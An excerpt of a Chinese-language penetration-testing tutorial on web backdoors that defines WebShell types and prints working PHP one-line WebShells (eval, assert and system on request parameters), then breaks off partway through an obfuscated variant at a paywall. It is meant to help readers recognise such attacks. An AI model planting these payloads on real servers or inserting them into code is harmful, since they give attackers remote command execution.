Web 后门技术是渗透测试中保持访问权限和信息收集的关键手段。本章重点介绍常见 WebShell 类型、上线机制及隐蔽通信方式,帮助你理解和识别这些攻击方式。
💻 4.1 WebShell 基础概念
WebShell:
一种用 Web 脚本语言(如 PHP、ASP、JSP)编写的远程控制程序,允许攻击者在浏览器中控制目标服务器。
常见类型:
-
命令执行类(如 eval、system)
-
文件管理类(上传、下载、删除)
-
数据库操作类(SQL 执行)
-
连接反弹类(上线至 C2)
🧬 4.2 WebShell 样本示例
PHP 一句话木马(典型示例):
<?php @eval($_POST['cmd']); ?>
变种:
<?php @assert($_REQUEST['x']); ?> <?php system($_GET['c']); ?>
防检测变种(编码、拼接):
<?php $a='ev';$b='al';$c=$_POST['
最低0.47元/天 解锁文章
扫一扫
1414
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
